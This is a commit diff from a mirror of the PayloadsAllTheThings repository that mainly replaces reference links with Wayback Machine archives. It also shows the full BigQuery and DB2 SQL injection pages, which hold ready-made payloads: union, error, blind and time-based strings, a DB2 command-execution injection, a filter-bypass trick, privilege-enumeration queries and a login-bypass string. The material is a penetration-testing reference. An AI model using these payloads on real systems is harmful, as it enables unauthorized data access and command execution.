gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2026-03-12 21:22:59 -07:00
Code Issues Packages Projects Releases Wiki Activity

Archive external reference links via Wayback Machine

Browse Source 
Replace direct URLs in Markdown references with their
web.archive.org equivalents to prevent link rot.
This commit is contained in:
Swissky
2026-03-09 13:02:28 +01:00
parent 769b300f4f
commit 497fbe925b
118 changed files with 1661 additions and 4600 deletions
Download Patch File Download Diff File Expand all files Collapse all files

128
SQL Injection/BigQuery Injection.md
View File

@@ -1,64 +1,64 @@
# Google BigQuery SQL Injection
> Google BigQuery SQL Injection is a type of security vulnerability where an attacker can execute arbitrary SQL queries on a Google BigQuery database by manipulating user inputs that are incorporated into SQL queries without proper sanitization. This can lead to unauthorized data access, data manipulation, or other malicious activities.
## Summary
* [Detection](#detection)
* [BigQuery Comment](#bigquery-comment)
* [BigQuery Union Based](#bigquery-union-based)
* [BigQuery Error Based](#bigquery-error-based)
* [BigQuery Boolean Based](#bigquery-boolean-based)
* [BigQuery Time Based](#bigquery-time-based)
* [References](#references)
## Detection
* Use a classic single quote to trigger an error: `'`
* Identify BigQuery using backtick notation: ```SELECT .... FROM `` AS ...```
| SQL Query | Description |
| ----------------------------------------------------- | -------------------- |
| `SELECT @@project_id` | Gathering project id |
| `SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA` | Gathering all dataset names |
| `select * from project_id.dataset_name.table_name` | Gathering data from specific project id & dataset |
## BigQuery Comment
| Type | Description |
|----------------------------|-----------------------------------|
| `#` | Hash comment |
| `/* PostgreSQL Comment */` | C-style comment |
## BigQuery Union Based
```ps1
UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#
```
## BigQuery Error Based
| SQL Query | Description |
| -------------------------------------------------------- | -------------------- |
| `' OR if(1/(length((select('a')))-1)=1,true,false) OR '` | Division by zero |
| `select CAST(@@project_id AS INT64)` | Casting |
## BigQuery Boolean Based
```ps1
' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#
```
## BigQuery Time Based
* Time based functions does not exist in the BigQuery syntax.
## References
* [BigQuery SQL Injection Cheat Sheet - Ozgur Alp - February 14, 2022](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac)
* [BigQuery Documentation - Query Syntax - October 30, 2024](https://cloud.google.com/bigquery/docs/reference/standard-sql/query-syntax)
* [BigQuery Documentation - Functions and Operators - October 30, 2024](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators)
* [Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability - Duc Nguyen - March 31, 2020](https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/)
# Google BigQuery SQL Injection
> Google BigQuery SQL Injection is a type of security vulnerability where an attacker can execute arbitrary SQL queries on a Google BigQuery database by manipulating user inputs that are incorporated into SQL queries without proper sanitization. This can lead to unauthorized data access, data manipulation, or other malicious activities.
## Summary
* [Detection](#detection)
* [BigQuery Comment](#bigquery-comment)
* [BigQuery Union Based](#bigquery-union-based)
* [BigQuery Error Based](#bigquery-error-based)
* [BigQuery Boolean Based](#bigquery-boolean-based)
* [BigQuery Time Based](#bigquery-time-based)
* [References](#references)
## Detection
* Use a classic single quote to trigger an error: `'`
* Identify BigQuery using backtick notation: ```SELECT .... FROM `` AS ...```
| SQL Query | Description |
| ----------------------------------------------------- | -------------------- |
| `SELECT @@project_id` | Gathering project id |
| `SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA` | Gathering all dataset names |
| `select * from project_id.dataset_name.table_name` | Gathering data from specific project id & dataset |
## BigQuery Comment
| Type | Description |
|----------------------------|-----------------------------------|
| `#` | Hash comment |
| `/* PostgreSQL Comment */` | C-style comment |
## BigQuery Union Based
```ps1
UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#
```
## BigQuery Error Based
| SQL Query | Description |
| -------------------------------------------------------- | -------------------- |
| `' OR if(1/(length((select('a')))-1)=1,true,false) OR '` | Division by zero |
| `select CAST(@@project_id AS INT64)` | Casting |
## BigQuery Boolean Based
```ps1
' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#
```
## BigQuery Time Based
* Time based functions does not exist in the BigQuery syntax.
## References
* [BigQuery SQL Injection Cheat Sheet - Ozgur Alp - February 14, 2022](https://web.archive.org/web/20260222133721/https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac)
* [BigQuery Documentation - Query Syntax - October 30, 2024](https://web.archive.org/web/20251109151650/https://cloud.google.com/bigquery/docs/reference/standard-sql/query-syntax)
* [BigQuery Documentation - Functions and Operators - October 30, 2024](https://web.archive.org/web/20170524193028/https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators)
* [Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability - Duc Nguyen - March 31, 2020](https://web.archive.org/web/20260225150843/https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/)

4
SQL Injection/Cassandra Injection.md
View File

@@ -53,5 +53,5 @@ SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILT
## References
* [Cassandra injection vulnerability triggered - DATADOG - January 30, 2023](https://docs.datadoghq.com/fr/security/default_rules/appsec-cass-injection-vulnerability-trigger/)
* [Investigating CQL injection in Apache Cassandra - Mehmet Leblebici - December 2, 2022](https://www.invicti.com/blog/web-security/investigating-cql-injection-apache-cassandra/)
* [Cassandra injection vulnerability triggered - DATADOG - January 30, 2023](https://web.archive.org/web/20230130053010/https://docs.datadoghq.com/fr/security/default_rules/appsec-cass-injection-vulnerability-trigger/)
* [Investigating CQL injection in Apache Cassandra - Mehmet Leblebici - December 2, 2022](https://web.archive.org/web/20251213065510/https://www.invicti.com/blog/web-security/investigating-cql-injection-apache-cassandra)

268
SQL Injection/DB2 Injection.md
View File

@@ -1,134 +1,134 @@
# DB2 Injection
> IBM DB2 is a family of relational database management systems (RDBMS) developed by IBM. Originally created in the 1980s for mainframes, DB2 has evolved to support various platforms and workloads, including distributed systems, cloud environments, and hybrid deployments.
## Summary
* [DB2 Comments](#db2-comments)
* [DB2 Default Databases](#db2-default-databases)
* [DB2 Enumeration](#db2-enumeration)
* [DB2 Methodology](#db2-methodology)
* [DB2 Error Based](#db2-error-based)
* [DB2 Blind Based](#db2-blind-based)
* [DB2 Time Based](#db2-time-based)
* [DB2 Command Execution](#db2-command-execution)
* [DB2 WAF Bypass](#db2-waf-bypass)
* [DB2 Accounts and Privileges](#db2-accounts-and-privileges)
* [References](#references)
## DB2 Comments
| Type | Description |
| -------------------------- | --------------------------------- |
| `--` | SQL comment |
## DB2 Default Databases
| Name | Description |
| ----------- | --------------------------------------------------------------------- |
| SYSIBM | Core system catalog tables storing metadata for database objects. |
| SYSCAT | User-friendly views for accessing metadata in the SYSIBM tables. |
| SYSSTAT | Statistics tables used by the DB2 optimizer for query optimization. |
| SYSPUBLIC | Metadata about objects available to all users (granted to PUBLIC). |
| SYSIBMADM | Administrative views for monitoring and managing the database system. |
| SYSTOOLs | Tools, utilities, and auxiliary objects provided for database administration and troubleshooting. |
## DB2 Enumeration
| Description | SQL Query |
| ---------------- | ----------------------------------------- |
| DBMS version | `select versionnumber, version_timestamp from sysibm.sysversions;` |
| DBMS version | `select service_level from table(sysproc.env_get_inst_info()) as instanceinfo` |
| DBMS version | `select getvariable('sysibm.version') from sysibm.sysdummy1` |
| DBMS version | `select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo` |
| DBMS version | `select service_level,bld_level from sysibmadm.env_inst_info` |
| Current user | `select user from sysibm.sysdummy1` |
| Current user | `select session_user from sysibm.sysdummy1` |
| Current user | `select system_user from sysibm.sysdummy1` |
| Current database | `select current server from sysibm.sysdummy1` |
| OS info | `select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info` |
## DB2 Methodology
| Description | SQL Query |
| ---------------- | ------------------------------------ |
| List databases | `SELECT distinct(table_catalog) FROM sysibm.tables` |
| List databases | `SELECT schemaname FROM syscat.schemata;` |
| List columns | `SELECT name, tbname, coltype FROM sysibm.syscolumns` |
| List tables | `SELECT table_name FROM sysibm.tables` |
| List tables | `SELECT name FROM sysibm.systables` |
| List tables | `SELECT tbname FROM sysibm.syscolumns WHERE name='username'` |
## DB2 Error Based
```sql
-- Returns all in one xml-formatted string
select xmlagg(xmlrow(table_schema)) from sysibm.tables
-- Same but without repeated elements
select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables)
-- Returns all in one xml-formatted string.
-- May need CAST(xml2clob(… AS varchar(500)) to display the result.
select xml2clob(xmelement(name t, table_schema)) from sysibm.tables
```
## DB2 Blind Based
| Description | SQL Query |
| ---------------- | ------------------------------------------ |
| Substring | `select substr('abc',2,1) FROM sysibm.sysdummy1` |
| ASCII value | `select chr(65) from sysibm.sysdummy1` |
| CHAR to ASCII | `select ascii('A') from sysibm.sysdummy1` |
| Select Nth Row | `select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only` |
| Bitwise AND | `select bitand(1,0) from sysibm.sysdummy1` |
| Bitwise AND NOT | `select bitandnot(1,0) from sysibm.sysdummy1` |
| Bitwise OR | `select bitor(1,0) from sysibm.sysdummy1` |
| Bitwise XOR | `select bitxor(1,0) from sysibm.sysdummy1` |
| Bitwise NOT | `select bitnot(1,0) from sysibm.sysdummy1` |
## DB2 Time Based
Heavy queries, if user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response.
```sql
' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68
```
## DB2 Command Execution
> The QSYS2.QCMDEXC() procedure and scalar function can be used to execute IBM i CL commands.
Using the `QSYS2.QCMDEXC()` on IBM i (previously named AS-400), it is possibile to achieve command execution.
```sql
'||QCMDEXC('QSH CMD(''system dspusrprf PROFILE'')')
```
## DB2 WAF Bypass
### Avoiding Quotes
```sql
SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1
```
## DB2 Accounts and Privileges
| Description | SQL Query |
| ---------------- | ------------------------------------ |
| List users | `select distinct(grantee) from sysibm.systabauth` |
| List users | `select distinct(definer) from syscat.schemata` |
| List users | `select distinct(authid) from sysibmadm.privileges` |
| List users | `select grantee from syscat.dbauth` |
| List privileges | `select * from syscat.tabauth` |
| List privileges | `select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies` |
| List DBA accounts | `select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'` |
| List DBA accounts | `select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = 'Y' or SYSADMAUTH = 'G'` |
| Location of DB files | `select * from sysibmadm.reg_variables where reg_var_name='DB2PATH'` |
## References
* [DB2 SQL injection cheat sheet - Adrián - May 20, 2012](https://securityetalii.es/2012/05/20/db2-sql-injection-cheat-sheet/)
* [Pentestmonkey's DB2 SQL Injection Cheat Sheet - @pentestmonkey - September 17, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
* [QSYS2.QCMDEXC() - IBM Support - April 22, 2023](https://www.ibm.com/support/pages/qsys2qcmdexc)
# DB2 Injection
> IBM DB2 is a family of relational database management systems (RDBMS) developed by IBM. Originally created in the 1980s for mainframes, DB2 has evolved to support various platforms and workloads, including distributed systems, cloud environments, and hybrid deployments.
## Summary
* [DB2 Comments](#db2-comments)
* [DB2 Default Databases](#db2-default-databases)
* [DB2 Enumeration](#db2-enumeration)
* [DB2 Methodology](#db2-methodology)
* [DB2 Error Based](#db2-error-based)
* [DB2 Blind Based](#db2-blind-based)
* [DB2 Time Based](#db2-time-based)
* [DB2 Command Execution](#db2-command-execution)
* [DB2 WAF Bypass](#db2-waf-bypass)
* [DB2 Accounts and Privileges](#db2-accounts-and-privileges)
* [References](#references)
## DB2 Comments
| Type | Description |
| -------------------------- | --------------------------------- |
| `--` | SQL comment |
## DB2 Default Databases
| Name | Description |
| ----------- | --------------------------------------------------------------------- |
| SYSIBM | Core system catalog tables storing metadata for database objects. |
| SYSCAT | User-friendly views for accessing metadata in the SYSIBM tables. |
| SYSSTAT | Statistics tables used by the DB2 optimizer for query optimization. |
| SYSPUBLIC | Metadata about objects available to all users (granted to PUBLIC). |
| SYSIBMADM | Administrative views for monitoring and managing the database system. |
| SYSTOOLs | Tools, utilities, and auxiliary objects provided for database administration and troubleshooting. |
## DB2 Enumeration
| Description | SQL Query |
| ---------------- | ----------------------------------------- |
| DBMS version | `select versionnumber, version_timestamp from sysibm.sysversions;` |
| DBMS version | `select service_level from table(sysproc.env_get_inst_info()) as instanceinfo` |
| DBMS version | `select getvariable('sysibm.version') from sysibm.sysdummy1` |
| DBMS version | `select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo` |
| DBMS version | `select service_level,bld_level from sysibmadm.env_inst_info` |
| Current user | `select user from sysibm.sysdummy1` |
| Current user | `select session_user from sysibm.sysdummy1` |
| Current user | `select system_user from sysibm.sysdummy1` |
| Current database | `select current server from sysibm.sysdummy1` |
| OS info | `select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info` |
## DB2 Methodology
| Description | SQL Query |
| ---------------- | ------------------------------------ |
| List databases | `SELECT distinct(table_catalog) FROM sysibm.tables` |
| List databases | `SELECT schemaname FROM syscat.schemata;` |
| List columns | `SELECT name, tbname, coltype FROM sysibm.syscolumns` |
| List tables | `SELECT table_name FROM sysibm.tables` |
| List tables | `SELECT name FROM sysibm.systables` |
| List tables | `SELECT tbname FROM sysibm.syscolumns WHERE name='username'` |
## DB2 Error Based
```sql
-- Returns all in one xml-formatted string
select xmlagg(xmlrow(table_schema)) from sysibm.tables
-- Same but without repeated elements
select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables)
-- Returns all in one xml-formatted string.
-- May need CAST(xml2clob(… AS varchar(500)) to display the result.
select xml2clob(xmelement(name t, table_schema)) from sysibm.tables
```
## DB2 Blind Based
| Description | SQL Query |
| ---------------- | ------------------------------------------ |
| Substring | `select substr('abc',2,1) FROM sysibm.sysdummy1` |
| ASCII value | `select chr(65) from sysibm.sysdummy1` |
| CHAR to ASCII | `select ascii('A') from sysibm.sysdummy1` |
| Select Nth Row | `select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only` |
| Bitwise AND | `select bitand(1,0) from sysibm.sysdummy1` |
| Bitwise AND NOT | `select bitandnot(1,0) from sysibm.sysdummy1` |
| Bitwise OR | `select bitor(1,0) from sysibm.sysdummy1` |
| Bitwise XOR | `select bitxor(1,0) from sysibm.sysdummy1` |
| Bitwise NOT | `select bitnot(1,0) from sysibm.sysdummy1` |
## DB2 Time Based
Heavy queries, if user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response.
```sql
' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68
```
## DB2 Command Execution
> The QSYS2.QCMDEXC() procedure and scalar function can be used to execute IBM i CL commands.
Using the `QSYS2.QCMDEXC()` on IBM i (previously named AS-400), it is possibile to achieve command execution.
```sql
'||QCMDEXC('QSH CMD(''system dspusrprf PROFILE'')')
```
## DB2 WAF Bypass
### Avoiding Quotes
```sql
SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1
```
## DB2 Accounts and Privileges
| Description | SQL Query |
| ---------------- | ------------------------------------ |
| List users | `select distinct(grantee) from sysibm.systabauth` |
| List users | `select distinct(definer) from syscat.schemata` |
| List users | `select distinct(authid) from sysibmadm.privileges` |
| List users | `select grantee from syscat.dbauth` |
| List privileges | `select * from syscat.tabauth` |
| List privileges | `select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies` |
| List DBA accounts | `select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'` |
| List DBA accounts | `select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = 'Y' or SYSADMAUTH = 'G'` |
| Location of DB files | `select * from sysibmadm.reg_variables where reg_var_name='DB2PATH'` |
## References
* [DB2 SQL injection cheat sheet - Adrián - May 20, 2012](https://web.archive.org/web/20211026090110/https://securityetalii.es/2012/05/20/db2-sql-injection-cheat-sheet/)
* [Pentestmonkey's DB2 SQL Injection Cheat Sheet - @pentestmonkey - September 17, 2011](https://web.archive.org/web/20260226035803/https://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
* [QSYS2.QCMDEXC() - IBM Support - April 22, 2023](https://web.archive.org/web/20230305185053/https://www.ibm.com/support/pages/qsys2qcmdexc)

14
SQL Injection/MSSQL Injection.md
View File

@@ -433,11 +433,11 @@ Use `SP_PASSWORD` in a query to hide from the logs like : `' AND 1=1--sp_passwor
## References
* [AWS WAF Clients Left Vulnerable to SQL Injection Due to Unorthodox MSSQL Design Choice - Marc Olivier Bergeron - June 21, 2023](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/)
* [AWS WAF Clients Left Vulnerable to SQL Injection Due to Unorthodox MSSQL Design Choice - Marc Olivier Bergeron - June 21, 2023](https://web.archive.org/web/20240219205617/https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/)
* [Error based SQL Injection in "Order By" clause - Manish Kishan Tanwar - March 26, 2018](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
* [Full MSSQL Injection PWNage - ZeQ3uL && JabAv0C - January 28, 2009](https://www.exploit-db.com/papers/12975)
* [IS_SRVROLEMEMBER (Transact-SQL) - Microsoft - April 9, 2024](https://docs.microsoft.com/en-us/sql/t-sql/functions/is-srvrolemember-transact-sql?view=sql-server-ver15)
* [MSSQL Injection Cheat Sheet - @pentestmonkey - August 30, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
* [MSSQL Trusted Links - HackTricks - September 15, 2024](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
* [SQL Server - Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
* [sys.fn_my_permissions (Transact-SQL) - Microsoft - January 25, 2024](https://docs.microsoft.com/en-us/sql/relational-databases/system-functions/sys-fn-my-permissions-transact-sql?view=sql-server-ver15)
* [Full MSSQL Injection PWNage - ZeQ3uL && JabAv0C - January 28, 2009](https://web.archive.org/web/20260222213546/https://www.exploit-db.com/papers/12975)
* [IS_SRVROLEMEMBER (Transact-SQL) - Microsoft - April 9, 2024](https://web.archive.org/web/20220906233249/https://docs.microsoft.com/en-us/SQL/t-sql/functions/is-srvrolemember-transact-sql?view=sql-server-ver15)
* [MSSQL Injection Cheat Sheet - @pentestmonkey - August 30, 2011](https://web.archive.org/web/20260214013447/https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
* [MSSQL Trusted Links - HackTricks - September 15, 2024](https://web.archive.org/web/20241126085555/https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
* [SQL Server - Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6, 2013](https://web.archive.org/web/20210227063841/https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
* [sys.fn_my_permissions (Transact-SQL) - Microsoft - January 25, 2024](https://web.archive.org/web/20220907211545/https://docs.microsoft.com/en-us/SQL/relational-databases/system-functions/sys-fn-my-permissions-transact-sql?view=sql-server-ver15)

16
SQL Injection/MySQL Injection.md
View File

@@ -763,13 +763,13 @@ Therefore, by using the payload `?id=1%df' and 1=1 --+`, after PHP adds the back
## References
* [[SQLi] Extracting data without knowing columns names - Ahmed Sultan - February 9, 2019](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/)
* [A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection - Marc Olivier Bergeron - October 19, 2021](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/)
* [Alternative for Information_Schema.Tables in MySQL - Osanda Malith Jayathissa - February 3, 2017](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
* [A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection - Marc Olivier Bergeron - October 19, 2021](https://web.archive.org/web/20211019152624/https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/)
* [Alternative for Information_Schema.Tables in MySQL - Osanda Malith Jayathissa - February 3, 2017](https://web.archive.org/web/20260227032450/https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
* [Ekoparty CTF 2016 (Web 100) - p4-team - October 26, 2016](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100)
* [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021](https://sqlwiki.netspi.com/injectionTypes/errorBased)
* [How to Use SQL Calls to Secure Your Web Site - IPA ISEC - March 2010](https://www.ipa.go.jp/security/vuln/ps6vr70000011hc4-att/000017321.pdf)
* [MySQL Out of Band Hacking - Osanda Malith Jayathissa - February 23, 2018](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
* [SQL injection - The oldschool way - 02 - Ahmed Sultan - January 1, 2025](https://www.youtube.com/watch?v=u91EdO1cDak)
* [SQL Truncation Attack - Rohit Shaw - June 29, 2014](https://resources.infosecinstitute.com/sql-truncation-attack/)
* [SQLi filter evasion cheat sheet (MySQL) - Johannes Dahse - December 4, 2010](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
* [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021](https://web.archive.org/web/20210215172533/https://sqlwiki.netspi.com/injectionTypes/errorBased/)
* [How to Use SQL Calls to Secure Your Web Site - IPA ISEC - March 2010](https://web.archive.org/web/20240118024024/https://www.ipa.go.jp/security/vuln/ps6vr70000011hc4-att/000017321.pdf)
* [MySQL Out of Band Hacking - Osanda Malith Jayathissa - February 23, 2018](https://web.archive.org/web/20260303030701/https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
* [SQL injection - The oldschool way - 02 - Ahmed Sultan - January 1, 2025](https://web.archive.org/web/20250807062504/https://www.youtube.com/watch?si=kFQkvCEn2NiWLDGY&v=u91EdO1cDak&feature=youtu.be)
* [SQL Truncation Attack - Rohit Shaw - June 29, 2014](https://web.archive.org/web/20201001181524/https://resources.infosecinstitute.com/sql-truncation-attack/)
* [SQLi filter evasion cheat sheet (MySQL) - Johannes Dahse - December 4, 2010](https://web.archive.org/web/20101209155346/http://websec.wordpress.com:80/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql)
* [The SQL Injection Knowledge Base - Roberto Salgado - May 29, 2013](https://websec.ca/kb/sql_injection#MySQL_Default_Databases)

8
SQL Injection/OracleSQL Injection.md
View File

@@ -229,8 +229,8 @@ utl_file.put_line(utl_file.fopen('/path/to/','file','R'), <buffer>)
## References
* [ASDC12 - New and Improved Hacking Oracle From Web - Sumit “sid” Siddharth - November 8, 2021](https://web.archive.org/web/20211108150011/https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf)
* [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
* [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021](https://web.archive.org/web/20260203031530/https://sqlwiki.netspi.com/injectionTypes/errorBased/)
* [ODAT: Oracle Database Attacking Tool - quentinhardy - March 24, 2016](https://github.com/quentinhardy/odat/wiki/privesc)
* [Oracle SQL Injection Cheat Sheet - @pentestmonkey - August 30, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
* [Pentesting Oracle TNS Listener - HackTricks - July 19, 2024](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener)
* [The SQL Injection Knowledge Base - Roberto Salgado - May 29, 2013](https://www.websec.ca/kb/sql_injection#Oracle_Default_Databases)
* [Oracle SQL Injection Cheat Sheet - @pentestmonkey - August 30, 2011](https://web.archive.org/web/20260228095123/https://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
* [Pentesting Oracle TNS Listener - HackTricks - July 19, 2024](https://web.archive.org/web/20220519160744/https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener)
* [The SQL Injection Knowledge Base - Roberto Salgado - May 29, 2013](https://web.archive.org/web/20260302110304/https://www.websec.ca/kb/sql_injection)

14
SQL Injection/PostgreSQL Injection.md
View File

@@ -281,10 +281,10 @@ SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
## References
* [A Penetration Tester's Guide to PostgreSQL - David Hayter - July 22, 2017](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
* [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - Leon Juranic - June 17, 2009](https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf)
* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - GreenWolf - March 20, 2019](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
* [Postgres SQL Injection Cheat Sheet - @pentestmonkey - August 23, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
* [PostgreSQL 9.x Remote Command Execution - dionach - October 26, 2017](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)
* [SQL Injection /webApp/oma_conf ctx parameter - Sergey Bobrov (bobrov) - December 8, 2016](https://hackerone.com/reports/181803)
* [SQL Injection and Postgres - An Adventure to Eventual RCE - Denis Andzakovic - May 5, 2020](https://pulsesecurity.co.nz/articles/postgres-sqli)
* [A Penetration Tester's Guide to PostgreSQL - David Hayter - July 22, 2017](https://web.archive.org/web/20250812102408/https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
* [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - Leon Juranic - June 17, 2009](https://web.archive.org/web/20200927000909/https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf)
* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - GreenWolf - March 20, 2019](https://web.archive.org/web/20250803101126/https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
* [Postgres SQL Injection Cheat Sheet - @pentestmonkey - August 23, 2011](https://web.archive.org/web/20260302153609/https://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
* [PostgreSQL 9.x Remote Command Execution - dionach - October 26, 2017](https://web.archive.org/web/20201001043242/https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)
* [SQL Injection /webApp/oma_conf ctx parameter - Sergey Bobrov (bobrov) - December 8, 2016](https://web.archive.org/web/20240613225549/https://hackerone.com/reports/181803)
* [SQL Injection and Postgres - An Adventure to Eventual RCE - Denis Andzakovic - May 5, 2020](https://web.archive.org/web/20251210040037/https://pulsesecurity.co.nz/articles/postgres-sqli)

22
SQL Injection/README.md
View File

@@ -148,7 +148,7 @@ SELECT * FROM users WHERE username = '' OR '1'='1'--' AND password = '';
Here, `'1'='1'` is always true, which means the query could return a valid user, effectively bypassing the authentication check.
:warning: In this case, the database will return an array of results because it will match every users in the table. This will produce an error in the server side since it was expecting only one result. By adding a `LIMIT` clause, you can restrict the number of rows returned by the query.
:warning: In this case, the database will return an array of results because it will match every users in the table. This will produce an error in the server side since it was expecting only one result. By adding a `LIMIT` clause, you can restrict the number of rows returned by the query.
By submitting the following payload in the username field, you will log in as the first user in the database. Additionally, you can inject a payload in the password field while using the correct username to target a specific user.
@@ -187,7 +187,7 @@ sql1 = "SELECT * FROM admin WHERE pass = ''or'6<>]<5D><>!r,<2C><>b'";
### Hashed Passwords
